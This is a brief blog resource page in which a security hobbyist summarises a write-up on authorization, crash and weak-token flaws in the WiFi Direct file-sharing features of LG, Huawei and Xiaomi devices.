Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Apparently WiFi Direct is a specific for P2P transfer over WiFi. Who knew!? These P2P communication protocols have several severe issues.

The LG SmartShare Beam had issues with authorization. In particular, a session ID was not required for transferring from one device to another. So, you could force send force to users devices with arbitrary names.

The Huawei Share was trivial to crash. Because of this, an application (running on the device), could purposely cause a crash on the file transfer server then bind their own port to this service. At this point, you can serve your own files using this API. Interesting attack scenario!

Xiaomi Mi Share was the most secure of the bunch. There was a DoS by sending a crazy large file and session tokens were 19-digits long and generated by the weak Java Random implementation.

Overall, the read is enjoyable. I appreciated how crashing the service actually turned into an exploitable vulnerability that was NOT just a DoS.